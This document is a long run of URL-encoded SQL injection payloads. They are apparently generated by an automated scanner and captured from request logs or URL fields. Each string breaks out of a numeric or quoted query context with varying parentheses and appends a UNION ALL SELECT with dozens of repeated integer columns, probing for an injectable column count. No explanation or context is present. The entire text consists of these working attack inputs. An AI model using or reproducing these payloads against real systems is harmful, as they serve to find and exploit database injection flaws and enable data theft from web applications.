-9003%29%29%20UNION%20ALL%20SELECT%204920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920--%20 -2886%29%29%20UNION%20ALL%20SELECT%203528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528--%20 -7037%29%29%29%20UNION%20ALL%20SELECT%206236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236%2C6236--%20 -3145%29%29%29%20UNION%20ALL%20SELECT%204691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691--%20 -8594%29%29%29%20UNION%20ALL%20SELECT%209058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058%2C9058--%20 -1245%29%29%29%20UNION%20ALL%20SELECT%204558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558--%20 -7883%29%29%29%20UNION%20ALL%20SELECT%205806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806--%20 -4578%29%29%29%20UNION%20ALL%20SELECT%205913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913--%20 -1313%29%29%29%20UNION%20ALL%20SELECT%202951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951%2C2951--%20 -5462%29%29%29%20UNION%20ALL%20SELECT%202743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743--%20 -6554%29%29%29%20UNION%20ALL%20SELECT%208303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303--%20 -6242%29%29%29%20UNION%20ALL%20SELECT%202080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080--%20 -8041%20UNION%20ALL%20SELECT%203428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428%2C3428--%20 -1942%20UNION%20ALL%20SELECT%209607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607--%20 -9163%20UNION%20ALL%20SELECT%204986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986--%20 -4316%20UNION%20ALL%20SELECT%209612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612--%20 -1306%20UNION%20ALL%20SELECT%201340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340--%20 -5776%20UNION%20ALL%20SELECT%204930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930%2C4930--%20 -3786%20UNION%20ALL%20SELECT%202692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692%2C2692--%20 -1738%20UNION%20ALL%20SELECT%201455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455--%20 -7076%20UNION%20ALL%20SELECT%202179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179--%20 -7859%20UNION%20ALL%20SELECT%206761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761%2C6761--%20 -3263%27%29%20UNION%20ALL%20SELECT%204840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840--%20 -3815%27%29%20UNION%20ALL%20SELECT%202234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234--%20 -6876%27%29%20UNION%20ALL%20SELECT%209354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354--%20 -8839%27%29%20UNION%20ALL%20SELECT%208723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723%2C8723--%20 -5943%27%29%20UNION%20ALL%20SELECT%209064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064%2C9064--%20 -5098%27%29%20UNION%20ALL%20SELECT%208629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629--%20 -5278%27%29%20UNION%20ALL%20SELECT%203240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240%2C3240--%20 -7319%27%29%20UNION%20ALL%20SELECT%203436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436%2C3436--%20 -7025%27%29%20UNION%20ALL%20SELECT%209698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698--%20 -9867%27%29%20UNION%20ALL%20SELECT%206516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516--%20 -8689%27%29%29%20UNION%20ALL%20SELECT%209400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400--%20 -4406%27%29%29%20UNION%20ALL%20SELECT%205001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001%2C5001--%20 -9445%27%29%29%20UNION%20ALL%20SELECT%207622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622%2C7622--%20 -7416%27%29%29%20UNION%20ALL%20SELECT%203780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780--%20 -8388%27%29%29%20UNION%20ALL%20SELECT%205038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038--%20 -9240%27%29%29%20UNION%20ALL%20SELECT%205455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455%2C5455--%20 -8781%27%29%29%20UNION%20ALL%20SELECT%206799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799--%20 -7174%27%29%29%20UNION%20ALL%20SELECT%202105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105%2C2105--%20 -4556%27%29%29%20UNION%20ALL%20SELECT%205252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252--%20 -6856%27%29%29%20UNION%20ALL%20SELECT%207299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299--%20 -1028%27%29%29%29%20UNION%20ALL%20SELECT%207196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196--%20 -2462%27%29%29%29%20UNION%20ALL%20SELECT%205171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171%2C5171--%20 -7456%27%29%29%29%20UNION%20ALL%20SELECT%201197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197--%20 -9831%27%29%29%29%20UNION%20ALL%20SELECT%208206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206%2C8206--%20 -3662%27%29%29%29%20UNION%20ALL%20SELECT%205625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625--%20 -9867%27%29%29%29%20UNION%20ALL%20SELECT%209600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600--%20 -9452%27%29%29%29%20UNION%20ALL%20SELECT%205299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299%2C5299--%20 -7453%27%29%29%29%20UNION%20ALL%20SELECT%204700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700--%20 -6665%27%29%29%29%20UNION%20ALL%20SELECT%202585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585%2C2585--%20 -4698%27%29%29%29%20UNION%20ALL%20SELECT%208490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490--%20 -7932%27%20UNION%20ALL%20SELECT%202931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931%2C2931--%20 -8645%27%20UNION%20ALL%20SELECT%202055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055%2C2055--%20 -6094%27%20UNION%20ALL%20SELECT%209756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756--%20 -4480%27%20UNION%20ALL%20SELECT%204265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265--%20 -7664%27%20UNION%20ALL%20SELECT%208924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924%2C8924--%20 -9348%27%20UNION%20ALL%20SELECT%203220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220--%20 -8295%27%20UNION%20ALL%20SELECT%209521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521--%20 